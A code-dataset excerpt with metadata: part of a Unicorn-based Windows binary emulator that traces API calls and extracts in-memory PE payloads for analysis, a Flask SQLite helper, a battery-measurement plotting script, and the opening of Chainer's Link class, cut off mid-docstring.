self.uc.reg_write(UC_X86_REG_ESP, int(current_esp + 4))
# Read a 4 byte value at a given address
def read_byte(self, addr):
val = self.uc.mem_read(addr, 4)
formated_value = struct.unpack('I', val)[0]
return formated_value
# Fake jmp to syscall ptr
def fake_jmpcall(self, addr, args_count, api, opcode, ret_value):
display = '> ' + hex(addr) + ': ' + api.replace('&', '') + '('
ret = self.popstack()
self.decstack()
loc_esp = self.uc.reg_read(UC_X86_REG_ESP)
loc_args = []
for x in range(0, args_count):
value = self.read_byte(loc_esp + (x*4))
loc_args.append(hex(value))
# display += str(loc_args).replace('[', '').replace(']', '').replace("'", '') + ''
args = loc_args
api_name = api.replace('&', '')
if api_name in dir(winsyscall):
function = getattr(winsyscall, api_name)
ret_code, ret_args = function(self, args)
if ret_code == 'THREAD':
taddr = int(self.threads[-1])
ret_code = 0x1
for elem in self.handle:
hval = self.handle[elem][0]
if hval == taddr:
ret_code = int(elem, 16)
break
if self.debug:
print('[!] Spawning a new thread at ' + hex(self.threads[-1]))
if ret_args == 'EXIT':
print(display + '0x0)')
self.uc.emu_stop()
return
display += str(ret_args).replace('[', '').replace(']','').replace("'", '') + ') = '
if ret_code != None:
display += hex(ret_code)
else:
display += str(ret_code)
else:
# clean_stack(self, args_count)
ret_code = 0x0
display += str(args).replace('[', '').replace(']', '').replace("'", '') + ') = '
display += hex(ret_code)
if len(self.current_loop) < self.max_loop:
self.current_loop.append(addr)
elif len(self.current_loop) == self.max_loop:
if self.previous_loop.sort() == self.current_loop.sort():
if self.current_loop_counter == self.max_loop:
print('[!] Inifinite loop detected, stoping the emulation')
self.uc.emu_stop()
return
self.current_loop = []
self.current_loop_counter += 1
else:
self.previous_loop = self.current_loop
print(display)
if ret_code != None:
self.uc.reg_write(UC_X86_REG_EAX, ret_code)
else:
self.uc.reg_write(UC_X86_REG_EAX, 0x0)
self.uc.reg_write(UC_X86_REG_EIP, ret)
def read_handle(self):
print('========= Opened Handles ========')
for h in self.handle:
handle_addr = h
handle_value = self.handle[h][0]
handle_type = self.handle[h][1]
if handle_type == 'dummy':
continue
if len(str(handle_value)) > 50:
handle_value = str(handle_value)[:25] + '[...]' + str(handle_value)[-9:]
print('Address=' + str(handle_addr) + ' Type=' + str(handle_type) + ' Value=' + str(handle_value) )
def display_extracts(self):
for vmem in self.virtual_memory:
content = self.uc.mem_read(vmem.data_address, vmem.data_size)
if content[:2] == b'MZ':
self.extracts['hmemory_' + hex(vmem.data_address)] = content
print('======= Extracted Payloads =======')
if len(self.extracts) == 0:
print('Nothing found')
return
dirname = './' + self.shortname + '_emu'
if not os.path.exists(dirname):
os.makedirs(dirname)
counter = 0
for entry in self.extracts:
name = entry[1:]
options = ''
data = self.extracts[entry]
if len(str(data)) > 50:
sdata = str(data)[:25] + '[...]' + str(data)[-9:]
else:
sdata = data
if data[:2] == b'MZ' or data[:2] == 'MZ':
options = ' (PE payload detected)'
print('Name="' + name + '" Content="' + sdata + '"' + options)
fname = name.split('\\')[-1]
if fname == '':
fname = 'generic_extract_' + str(counter) + '.bin'
f = open(dirname + '/' + fname, 'wb')
f.write(data)
f.close()
def read_dynamic_imports(self):
print('========= Dynamic Imports =======')
if len(self.dynamics) == 0x0:
print('No dynamic imports where detected during the emulation')
for i in self.dynamics:
print('Address=', i[0], ' Name=', i[1])
def read_full_regs(self):
print('=== Registers Dump ===')
print('EAX: 0x%08x | EBP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EAX), self.uc.reg_read(UC_X86_REG_EBP)))
print('EBX: 0x%08x | ESP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EBX), self.uc.reg_read(UC_X86_REG_ESP)))
print('ECX: 0x%08x | ESI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_ECX), self.uc.reg_read(UC_X86_REG_ESI)))
print('EDX: 0x%08x | EDI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EDX), self.uc.reg_read(UC_X86_REG_EDI)))
print('EIP: 0x%08x ' % self.uc.reg_read(UC_X86_REG_EIP))
def extract_API_args(self, api_name):
with open(API_refs) as f:
line = next((l for l in f if api_name == l.split(';')[0]), None)
if line == None or line == '':
return False, '', '', 0
name = line.split(';')[0]
description = line.split(';')[1].split(';')[0]
args = line.split(';')[2]
args_count = args.count(',') + 1
if args_count == 1 and args.replace('\n', '').replace(' ','') == '':
args_count = 0
if args == '' or args == None:
# We're double fucked maaaatee
return True, description, '', 0
return True, description, args, args_count
def generate_Import_Address_Table(self):
self.IAT = {}
self.raw_IAT = {}
dll_count = 0
functions_count = 0
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
functions = {}
dll_count += 1
for imp in entry.imports:
functions_count += 1
functions[hex(imp.address)] = imp.name.decode()
self.raw_IAT[hex(imp.address)] = imp.name.decode()
self.IAT[entry.dll.lower().decode()] = functions
self.IAT['dynamic_import'] = {'0x00ff0000': 'placeholder_dynamic_import'}
if self.debug:
print('[DEBUG] ' + str(functions_count) + ' functions imported in the IAT from ' + str(dll_count) + ' DLL')
def hook_Import_Address_Table(self):
self.IAT_hook = {}
cnt = 0
for dll in self.IAT:
if dll == 'dynamic_import':
continue
for entry_addr in self.IAT[dll]:
entry = self.IAT[dll][entry_addr]
content = self.uc.mem_read(int(entry_addr, 16), 0x4)
value = '0x' + struct.pack("<I", int(bytes(content).hex(), 16)).hex()
self.IAT_hook[entry] = value
cnt += 1
if self.debug:
print('[DEBUG] ' + str(cnt) + ' IAT entry where hooked')
def generate_Thread_Information_Block(self):
self.TEB_base_addr = 0x200000
self.process_ID = 0x1908
self.thread_ID = 0x10C
self.PEB_base_addr = self.TEB_base_addr + 0x1000
TEB = b''
TEB += struct.pack("<I", 0xffffffff)
TEB += struct.pack("<I", (self.stack_addr + self.stack_size))
TEB += struct.pack("<I", self.stack_addr)
TEB += struct.pack("<I", 0x0)
TEB += struct.pack("<I", 0x0)
TEB += struct.pack("<I", 0x0)
TEB += struct.pack("<I", self.TEB_base_addr)
TEB += struct.pack("<I", 0x0)
TEB += struct.pack("<I", self.process_ID)
TEB += struct.pack("<I", self.thread_ID)
TEB += struct.pack("<I", 0x0)
TEB += struct.pack("<I", 0x0)
TEB += struct.pack("<I", self.PEB_base_addr)
page_size=4096
m = 0x5000 % page_size
f = page_size - m
aligned_size = 0x5000 + f
self.uc.mem_map(self.TEB_base_addr, aligned_size)
self.uc.mem_write(self.TEB_base_addr, TEB)
def launch(self):
self.header_image_base = self.pe.OPTIONAL_HEADER.ImageBase
self.header_size_of_image = self.pe.OPTIONAL_HEADER.SizeOfImage
self.header_entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
self.mapped_image = self.pe.get_memory_mapped_image(ImageBase=self.header_image_base)
self.mapped_size = (len(self.mapped_image) + 0x1000) & ~0xFFF
self.exit_addr = 0xfffff000
if self.out != None:
sys.stdout = open(self.out, "w")
min_offset = sys.maxsize
virtual_size = 0
for section in self.pe.sections:
min_offset = section.VirtualAddress
virtual_size += min_offset
virtual_size += min_offset
m = virtual_size % 4096
f = 4096 - m
aligned_virtual_size = virtual_size + f
self.uc.mem_map(self.header_image_base, self.mapped_size)
self.uc.mem_write(self.header_image_base, self.mapped_image)
self.start_addr = self.header_entrypoint + self.header_image_base
if self.debug:
print('[DEBUG] Binary mapped in memory at 0x%08x' % self.header_image_base)
self.stack_addr = 0x0
self.stack_size = 0x200000
self.uc.mem_map(self.stack_addr, self.stack_size)
if self.debug:
print('[DEBUG] Stack of 0x%x bytes starting at 0x%08x' % (self.stack_size, self.stack_addr))
self.uc.reg_write(UC_X86_REG_ESP, self.stack_addr + self.stack_size - 0x500)
self.uc.reg_write(UC_X86_REG_EBP, self.stack_addr + self.stack_size - 0x100)
if self.debug:
print('[DEBUG] Initial stack frame created between 0x%08x and 0x%08x' % (self.stack_size - 0x500, self.stack_size - 0x100))
self.generate_Thread_Information_Block()
if self.debug:
print('[DEBUG] Thread Information Block initiated at 0x%08x' % self.TEB_base_addr)
self.generate_Import_Address_Table()
self.hook_Import_Address_Table()
self.uc.reg_write(UC_X86_REG_EDI, self.start_addr)
self.uc.reg_write(UC_X86_REG_ESI, self.start_addr)
self.uc.reg_write(UC_X86_REG_EDX, self.start_addr)
self.uc.reg_write(UC_X86_REG_ECX, self.start_addr)
self.uc.reg_write(UC_X86_REG_EBX, self.PEB_base_addr)
self.uc.reg_write(UC_X86_REG_EAX, self.TEB_base_addr)
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
print('[DEBUG] Starting the emulation of "%s.exe" from 0x%08x' % (self.drivename, self.start_addr))
print()
self.uc.emu_start(self.start_addr, self.start_addr + 500000, timeout=20 * UC_SECOND_SCALE)
print()
if len(self.threads) != 0:
uniq_threads = list(dict.fromkeys(self.threads))
else:
uniq_threads = False
if self.debug:
print('[!] Looking for entrypoints in the threads queue')
if uniq_threads:
for thread_addr in uniq_threads:
print('[!] Starting the thread ' + hex(thread_addr))
self.execution_mode = 'thread'
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
self.uc.emu_start(thread_addr, self.start_addr + 100, timeout=20 * UC_SECOND_SCALE)
print('[!] End of the thread ' + hex(thread_addr))
self.thread_trace = []
print()
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
if args.dynamics:
self.read_dynamic_imports()
print()
if self.stack:
self.read_stack(final_esp, final_ebp - final_esp)
print()
if self.registers:
self.read_full_regs()
print()
if self.handle_list:
self.read_handle()
print()
if self.show_extract:
self.display_extracts()
print()
if self.trace:
print('==== Call trace ====')
print(' → Entrypoint')
for elem in self.calltrace:
print(' → ' + elem)
if self.out != None:
sys.stdout.close()
def main(args):
emul = Environment(args)
emul.launch()
parser = argparse.ArgumentParser(description='Windows Binary Emulator')
parser.add_argument('-p', '--path', required=True, help='path to the binary file to emulate')
parser.add_argument('-b', '--breakpoint', required=False, help='pause the execution at the given address')
parser.add_argument('--trace', required=False, action="store_true", help='display the call trace of the binary')
parser.add_argument('--dump', required=False, action="store_true", help='display a full dump of the program\'s state after the execution')
parser.add_argument('--stack', required=False, action="store_true", help='display a dump of the stack after the execution')
parser.add_argument('--registers', required=False, action="store_true", help='display a dump of the regsiters after the execution')
parser.add_argument('--debug', required=False, action="store_true", help='display debug messages')
parser.add_argument('--silent', required=False, action="store_true", help='only print out the system calls')
parser.add_argument('--handle', required=False, action="store_true", help='display the list of used handles')
parser.add_argument('--extract', required=False, action="store_true", help='extract potentials payloads found in memory. Files are saved to <bin_name>_emu.out/')
parser.add_argument('--imports', required=False, action="store_true", help='UNIMPLEMENTED - display the static content of the import address table (IAT)')
parser.add_argument('--dynamics', required=False, action="store_true", help='display the list of dynamically resolved syscall')
parser.add_argument('--out', required=False, help='save the emulation output to a file')
args = parser.parse_args()
main(args)
| true
| true
|
f70b3a6a57e971fa38748f6fcdeb53521d3f0eda
| 535
|
py
|
Python
|
db_helpers.py
|
crisb0/final3011
|
8110b01edf17a4787d19ac8083ac4542381880b8
|
[
"MIT"
] | null | null | null |
db_helpers.py
|
crisb0/final3011
|
8110b01edf17a4787d19ac8083ac4542381880b8
|
[
"MIT"
] | null | null | null |
db_helpers.py
|
crisb0/final3011
|
8110b01edf17a4787d19ac8083ac4542381880b8
|
[
"MIT"
] | 1
|
2018-09-25T03:52:04.000Z
|
2018-09-25T03:52:04.000Z
|
import sqlite3
from app import app
from flask import g
DATABASE = 'db/trackpants.db'
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_db(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
| 21.4
| 52
| 0.639252
|
import sqlite3
from app import app
from flask import g
DATABASE = 'db/trackpants.db'
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_db(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
| true
| true
|
f70b3c27a05fab17b36c2b9e4c733ddb6b814531
| 2,463
|
py
|
Python
|
example/Python_Plot/Battery example/ee_0120_Y_consist.py
|
Mic-Tsai/Power-Consumption-Current-Sense-System-V22
|
7fe8348171efe53a2985a591ef7cf657bacc5fbd
|
[
"MIT"
] | 1
|
2020-08-19T02:30:42.000Z
|
2020-08-19T02:30:42.000Z
|
example/Python_Plot/Battery example/ee_0120_Y_consist.py
|
Mic-Tsai/Power-Consumption-Current-Sense-System-V22
|
7fe8348171efe53a2985a591ef7cf657bacc5fbd
|
[
"MIT"
] | null | null | null |
example/Python_Plot/Battery example/ee_0120_Y_consist.py
|
Mic-Tsai/Power-Consumption-Current-Sense-System-V22
|
7fe8348171efe53a2985a591ef7cf657bacc5fbd
|
[
"MIT"
] | null | null | null |
import argparse, re, sys, os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
path = ''
flname = sys.argv[1]
try:
chartType = sys.argv[2]
except:
chartType = 'ch1_vload'
print('chartType:'+chartType)
fl = flname.split('/')
for i in fl[:-1]:
path = path+i+'/'
fw = open(flname, 'r')
rawdata = fw.read().strip()
ch1_list = []
ch2_list = []
ch1_vload = []
ch1_volt = []
ch1_iload = []
ch1_pload = []
ch2_vload = []
ch2_volt = []
ch2_iload = []
ch2_pload = []
unit = ''
line = rawdata.split('\n')
for aline in line:
tmp = aline.split('||')
ch1_list.append(tmp[0].lstrip())
ch2_list.append(tmp[2].lstrip())
for item in ch1_list:
tmp = item.split(' | ')
for sub in tmp:
if sub.count("V-load"):
ch1_vload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("Voltage"):
ch1_volt.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("I-load"):
ch1_iload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("P-load"):
ch1_pload.append(float(re.search('\d+\.\d+', sub).group()))
for item in ch2_list:
tmp = item.split(' | ')
for sub in tmp:
if sub.count("V-load"):
ch2_vload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("Voltage"):
ch2_volt.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("I-load"):
ch2_iload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("P-load"):
ch2_pload.append(float(re.search('\d+\.\d+', sub).group()))
if chartType.lower().count('vload') or chartType.lower().count('v-load'):
print('**vload')
unit = 'V'
if chartType.lower().count('ch1'):
y = ch1_vload
else:
y = ch2_vload
elif chartType.lower().count('volt'):
print('**volt')
unit = 'mV'
if chartType.lower().count('ch1'):
y = ch1_volt
else:
y = ch2_volt
elif chartType.lower().count('iload') or chartType.lower().count('i-load'):
print('**iload')
unit = 'mA'
if chartType.lower().count('ch1'):
y = ch1_iload
else:
y = ch2_iload
elif chartType.lower().count('pload') or chartType.lower().count('p-load'):
print('**pload')
unit = 'mW'
if chartType.lower().count('ch1'):
y = ch1_pload
else:
y = ch2_pload
x = np.linspace(1,len(y),len(y))
fig = plt.figure(1)
ax = plt.axes()
plt.xlim([0, len(y)])
plt.ylim([0,160])
plt.plot(x,y,ls='-',c='b')
plt.grid('on')
plt.title(chartType)
plt.ylabel('['+unit+']')
plt.savefig(path+chartType+'.png')
print("File Path:"+path+chartType+'.png')
| 21.417391
| 75
| 0.624036
|
import argparse, re, sys, os
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
path = ''
flname = sys.argv[1]
try:
chartType = sys.argv[2]
except:
chartType = 'ch1_vload'
print('chartType:'+chartType)
fl = flname.split('/')
for i in fl[:-1]:
path = path+i+'/'
fw = open(flname, 'r')
rawdata = fw.read().strip()
ch1_list = []
ch2_list = []
ch1_vload = []
ch1_volt = []
ch1_iload = []
ch1_pload = []
ch2_vload = []
ch2_volt = []
ch2_iload = []
ch2_pload = []
unit = ''
line = rawdata.split('\n')
for aline in line:
tmp = aline.split('||')
ch1_list.append(tmp[0].lstrip())
ch2_list.append(tmp[2].lstrip())
for item in ch1_list:
tmp = item.split(' | ')
for sub in tmp:
if sub.count("V-load"):
ch1_vload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("Voltage"):
ch1_volt.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("I-load"):
ch1_iload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("P-load"):
ch1_pload.append(float(re.search('\d+\.\d+', sub).group()))
for item in ch2_list:
tmp = item.split(' | ')
for sub in tmp:
if sub.count("V-load"):
ch2_vload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("Voltage"):
ch2_volt.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("I-load"):
ch2_iload.append(float(re.search('\d+\.\d+', sub).group()))
elif sub.count("P-load"):
ch2_pload.append(float(re.search('\d+\.\d+', sub).group()))
if chartType.lower().count('vload') or chartType.lower().count('v-load'):
print('**vload')
unit = 'V'
if chartType.lower().count('ch1'):
y = ch1_vload
else:
y = ch2_vload
elif chartType.lower().count('volt'):
print('**volt')
unit = 'mV'
if chartType.lower().count('ch1'):
y = ch1_volt
else:
y = ch2_volt
elif chartType.lower().count('iload') or chartType.lower().count('i-load'):
print('**iload')
unit = 'mA'
if chartType.lower().count('ch1'):
y = ch1_iload
else:
y = ch2_iload
elif chartType.lower().count('pload') or chartType.lower().count('p-load'):
print('**pload')
unit = 'mW'
if chartType.lower().count('ch1'):
y = ch1_pload
else:
y = ch2_pload
x = np.linspace(1,len(y),len(y))
fig = plt.figure(1)
ax = plt.axes()
plt.xlim([0, len(y)])
plt.ylim([0,160])
plt.plot(x,y,ls='-',c='b')
plt.grid('on')
plt.title(chartType)
plt.ylabel('['+unit+']')
plt.savefig(path+chartType+'.png')
print("File Path:"+path+chartType+'.png')
| true
| true
|
f70b3cd7485a9d19d3382154bde58d1928fe6a52
| 45,421
|
py
|
Python
|
chainer/link.py
|
lazykyama/chainer
|
d4965bbf53af9e1b74b9b8a518f92c751f652a33
|
[
"MIT"
] | 1
|
2019-09-04T15:15:43.000Z
|
2019-09-04T15:15:43.000Z
|
chainer/link.py
|
dr4mohamed/chainer
|
6fa28004889b260ae13484f17dc1ac68b25d52bb
|
[
"MIT"
] | null | null | null |
chainer/link.py
|
dr4mohamed/chainer
|
6fa28004889b260ae13484f17dc1ac68b25d52bb
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import collections
import contextlib
import copy
import typing as tp # NOQA
import warnings
import numpy
import six
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import device_resident
from chainer import initializers
from chainer import link_hook
from chainer import types # NOQA
from chainer.utils import collections_abc
from chainer import variable
def _is_shape(value):
# type: (tp.Optional[tp.Any]) -> bool
if value is None:
return True
elif isinstance(value, collections_abc.Sequence):
try:
return all(int(x) for x in value)
except TypeError:
return False
try:
int(value) # try to cast
return True
except TypeError:
return False
def _ensure_shape_dtype(value):
# type: (tp.Optional[tp.Any]) -> tp.Tuple[tp.Optional[types.ShapeSpec], types.DTypeSpec] # NOQA
# Return value paired with dtype FP32 if it is a shape.
if _is_shape(value):
return value, numpy.float32
# Otherwise, returns it with assuming a shape-dtype pair.
else:
return value # type: ignore
class Link(device_resident.DeviceResident):
"""Building block of model definitions.
Link is a building block of neural network models that support various
features like handling parameters, defining network fragments,
serialization, etc.
Link is the primitive structure for the model definitions. It supports
management of parameter variables and *persistent values* that should be
incorporated to serialization.
Parameter is an instance of :class:`~chainer.Parameter` registered to a
link. A :class:`~chainer.Parameter` object can be registered as a
parameter of the link by assigning it to an attribute within *an
initialization scope*, which is a code surrounded by a
:meth:`init_scope` context manager using the ``with`` statement.
Persistent values are arrays, scalars, or any other serializable values
registered via :meth:`register_persistent` or :meth:`add_persistent`.
.. note::
Whereas arbitrary serializable objects can be registered as persistent
values, it is strongly recommended that you just register values that
should be treated as results of learning. A typical example of
persistent values is ones computed during training and required for
testing, e.g. running statistics for batch normalization.
Parameters and persistent values are referred by their names. They can be
accessed as attributes of the links. Link class itself manages the lists
of names of parameters and persistent values to distinguish parameters and
persistent values from other attributes.
Link can be composed into more complex models. This composition feature is
supported by child classes like :class:`Chain` and :class:`ChainList`. One
can create a chain by combining one or more links. See the documents for
these classes for details.
As noted above, Link supports the serialization protocol of the
:class:`~chainer.Serializer` class. **Note that only parameters and
persistent values are saved and loaded.** Other attributes are considered
as a part of user program (i.e. a part of network definition). In order to
construct a link from saved file, other attributes must be identically
reconstructed by user codes.
.. admonition:: Example
This is a simple example of custom link definition. Chainer itself also
provides many links defined under the :mod:`~chainer.links` module. They
might serve as examples, too.
Consider we want to define a simple primitive link that implements a
fully-connected layer based on the :func:`~functions.linear` function.
Note that this function takes input units, a weight variable, and a bias
variable as arguments. Then, the fully-connected layer can be defined as
follows::
import chainer
import chainer.functions as F
from chainer import initializers
import numpy as np
class LinearLayer(chainer.Link):
def __init__(self, n_in, n_out):
super(LinearLayer, self).__init__()
with self.init_scope():
self.W = chainer.Parameter(
initializers.Normal(), (n_out, n_in))
self.b = chainer.Parameter(
initializers.Zero(), (n_out,))
def forward(self, x):
return F.linear(x, self.W, self.b)
This example shows that a user can define arbitrary parameters and use
them in any methods. Links typically implement the ``forward``
operator, although they can also provide other methods to implement the
forward propagation.
Args:
params:
Names, shapes, and optional dtypes of initial parameters.
The keywords are used as the parameter names and the corresponding
values consist either of the shape or a tuple of shape and a dtype
``(shape, dtype)``.
If only the shape is supplied, the default dtype will be used.
Attributes:
name (str): Name of this link, given by the parent chain (if exists).
"""
_local_link_hooks = None # type: tp.Optional[collections.OrderedDict[str, chainer.LinkHook]] # NOQA
__init_done = False
def __init__(self, **params):
# type: (**tp.Any) -> None
super(Link, self).__init__()
self._params = set() # type: tp.Set[str]
self._persistent = set() # type: tp.Set[str]
self._within_init_scope = False # type: bool
self.name = None # type: tp.Optional[str]
# This flag has to be set before calling add_param().
self.__init_done = True
for name, value in six.iteritems(params):
shape, dtype = _ensure_shape_dtype(value)
self.add_param(name, shape, dtype=dtype)
def __check_init_done(self):
if not self.__init_done:
raise RuntimeError('Link.__init__() has not been called.')
def __str__(self):
specs = ', '.join(
'{}={}'.format(k, v) for k, v in self.printable_specs
)
return '{cls}({specs})'.format(
cls=self.__class__.__name__, specs=specs,
)
@property
def local_link_hooks(self):
# type: () -> collections.OrderedDict[str, chainer.LinkHook]
"""Ordered dictionary of registered link hooks.
Contrary to ``chainer.thread_local.link_hooks``,
which registers its elements to all functions,
link hooks in this property are specific to this link.
"""
if self._local_link_hooks is None:
self._local_link_hooks = collections.OrderedDict()
return self._local_link_hooks
@property
def _n_local_link_hooks(self):
# type: () -> int
return (0 if self._local_link_hooks is None
else len(self._local_link_hooks))
@property
def _device_id(self):
warnings.warn(
'Link._device_id is left only for backward compatibility and '
'likely to be removed. Use Link.device instead.',
DeprecationWarning)
device = self.device
if device.xp is cuda.cupy:
return device.device.id
return None
@property
def printable_specs(self):
"""Generator of printable specs of this link.
Yields:
specs (tuple of str and object):
Basically, it returns the arguments (pair of keyword and value)
that are passed to the :meth:`__init__`. This pair of key and
value is used for representing this class or subclass with
:meth:`__str__`.
"""
if 0:
yield
@property
def within_init_scope(self):
# type: () -> bool
"""True if the current code is inside of an initialization scope.
See :meth:`init_scope` for the details of the initialization scope.
"""
return getattr(self, '_within_init_scope', False)
@contextlib.contextmanager
def init_scope(self):
# type: () -> tp.Iterator[None]
"""Creates an initialization scope.
This method returns a context manager object that enables registration
of parameters (and links for :class:`~chainer.Chain`) by an assignment.
A :class:`~chainer.Parameter` object can be automatically registered
by assigning it to an attribute under this context manager.
.. admonition:: Example
In most cases, the parameter registration is done in the
initializer method. Using the ``init_scope`` method, we can
simply assign a :class:`~chainer.Parameter` object to register
it to the link.
.. code-block:: python
class MyLink(chainer.Link):
def __init__(self):
super().__init__()
with self.init_scope():
self.W = chainer.Parameter(0, (10, 5))
self.b = chainer.Parameter(0, (5,))
"""
# super().__init__ must be called before init_scope().
self.__check_init_done()
old_flag = self.within_init_scope
self._within_init_scope = True
try:
yield
finally:
self._within_init_scope = old_flag
def __call__(self, *args, **kwargs):
# type: (*tp.Any, **tp.Any) -> tp.Any # NOQA
self.__check_init_done()
# TODO(niboshi): Support link hooks for other forward methods.
hooks = chainer._get_link_hooks()
if self._n_local_link_hooks > 0:
hooks = collections.OrderedDict(hooks)
hooks.update(self.local_link_hooks)
hooks = hooks.values() # avoid six for performance
# Call forward_preprocess hook
if hooks:
pre_cb_args = link_hook._ForwardPreprocessCallbackArgs(
self, 'forward', args, kwargs)
for hook in hooks:
hook.forward_preprocess(pre_cb_args)
# Call the forward function
# (See #5078) super().__call__ is used when the method is injected by a
# mixin class. To keep backward compatibility, the injected one is
# prioritized over forward().
forward = getattr(super(Link, self), '__call__', None)
if forward is None:
# forward is implemented in the child classes
forward = self.forward # type: ignore
out = forward(*args, **kwargs)
# Call forward_postprocess hook
if hooks:
post_cb_args = link_hook._ForwardPostprocessCallbackArgs(
self, 'forward', args, kwargs, out)
for hook in hooks:
hook.forward_postprocess(post_cb_args)
return out
def __setattr__(self, name, value):
# type: (str, tp.Any) -> None
if self.within_init_scope and isinstance(value, variable.Parameter):
value.name = name
self._params.add(name)
self._persistent.discard(name)
super(Link, self).__setattr__(name, value)
def __delattr__(self, name):
# type: (str) -> None
self._params.discard(name)
self._persistent.discard(name)
super(Link, self).__delattr__(name)
def add_param(self, name, shape=None, dtype=numpy.float32,
initializer=None):
# type: (str, tp.Optional[types.ShapeSpec], types.DTypeSpec, tp.Optional[types.InitializerSpec]) -> None # NOQA
"""Registers a parameter to the link.
Args:
name (str): Name of the parameter. This name is also used as the
attribute name.
shape (int or tuple of ints): Shape of the parameter array. If it
is omitted, the parameter variable is left uninitialized.
dtype: Data type of the parameter array.
initializer (:ref:`initializer <initializer>`): If it is not
``None``, the data is initialized with the given initializer.
If it is an array, the data is directly initialized by it. If
it is callable, it is used as a weight initializer. Note that
in these cases, ``dtype`` argument is ignored. It can also be
a scalar, in which case the data array will be filled by this
scalar. Note that float32 is used in this case.
"""
if name in self.__dict__:
raise AttributeError(
'cannot register a new parameter %s: attribute exists'
% name)
if initializer is None:
initializer = initializers.NaN(dtype)
param = variable.Parameter(initializer, shape)
with self.init_scope():
setattr(self, name, param)
def add_persistent(self, name, value):
# type: (str, tp.Any) -> None
"""Registers a persistent value to the link.
The registered value is saved and loaded on serialization and
deserialization. The value is set to an attribute of the link.
Args:
name (str): Name of the persistent value. This name is also used
for the attribute name.
value: Value to be registered.
"""
d = self.__dict__
if name in d:
raise AttributeError(
'cannot register a new persistent value %s: attribute exists'
% name)
self._persistent.add(name)
self._params.discard(name)
d[name] = value
def register_persistent(self, name):
# type: (str) -> None
"""Registers an attribute of a given name as a persistent value.
This is a convenient method to register an existing attribute as a
persistent value. If ``name`` has been already registered as a
parameter, this method removes it from the list of parameter names
and re-registers it as a persistent value.
Args:
name (str): Name of the attribute to be registered.
"""
if not hasattr(self, name):
raise AttributeError(
'cannot register non-existent attribute %s as a persistent '
'value' % name)
self._persistent.add(name)
self._params.discard(name)
def copy(self, mode='share'):
# type: (str) -> 'Link'
"""Copies the link hierarchy to new one.
The whole hierarchy rooted by this link is copied. There are three
modes to perform copy. Please see the documentation for the argument
``mode`` below.
The name of the link is reset on the copy, since the copied instance
does not belong to the original parent chain (even if exists).
Args:
mode (str): It should be either ``init``, ``copy``, or ``share``.
``init`` means parameter variables under the returned link
object is re-initialized by calling their
:meth:`~chainer.Parameter.initialize` method, so that all the
parameters may have different initial values from the original
link.
``copy`` means that the link object is deeply copied, so that
its parameters are not re-initialized but are also deeply
copied. Thus, all parameters have same initial values but can
be changed independently.
``share`` means that the link is shallowly copied, so that its
parameters' arrays are shared with the original one. Thus,
their values are changed synchronously. The default ``mode``
is ``share``.
Returns:
Link: Copied link object.
"""
if mode == 'share':
ret = copy.copy(self)
ret._params = set(self._params)
ret._persistent = set(self._persistent)
ret.name = None
d = ret.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in ret._params:
d[name] = copy.copy(d[name])
d[name].grad = None
return ret
elif mode == 'copy':
return copy.deepcopy(self)
elif mode == 'init':
ret = copy.deepcopy(self)
for param in ret.params(include_uninit=False):
param.initialize(param.shape)
return ret
else:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
def device_resident_accept(self, visitor):
super(Link, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._params:
x = d[name]
visitor.visit_variable(x)
for name in self._persistent:
x = d[name]
if isinstance(x, chainer.get_array_types()):
d[name] = visitor.visit_array(x)
def params(self, include_uninit=True):
# type: (bool) -> tp.Iterator[chainer.Parameter]
"""Returns a generator of all parameters under the link hierarchy.
Args:
include_uninit (bool): If ``True``, it also generates uninitialized
parameters.
Returns:
A generator object that generates all parameters.
"""
d = self.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield d[name]
def namedparams(self, include_uninit=True):
# type: (bool) -> tp.Iterator[tp.Tuple[str, chainer.Parameter]]
"""Returns a generator of all (path, param) pairs under the hierarchy.
Args:
include_uninit (bool): If ``True``, it also generates uninitialized
parameters.
Returns:
A generator object that generates all (path, parameter) pairs. The
paths are relative from this link.
"""
d = self.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield '/' + name, d[name]
def links(self, skipself=False):
# type: (bool) -> tp.Iterator['Link']
"""Returns a generator of all links under the hierarchy.
Args:
skipself (bool): If ``True``, then the generator skips this link
and starts with the first child link.
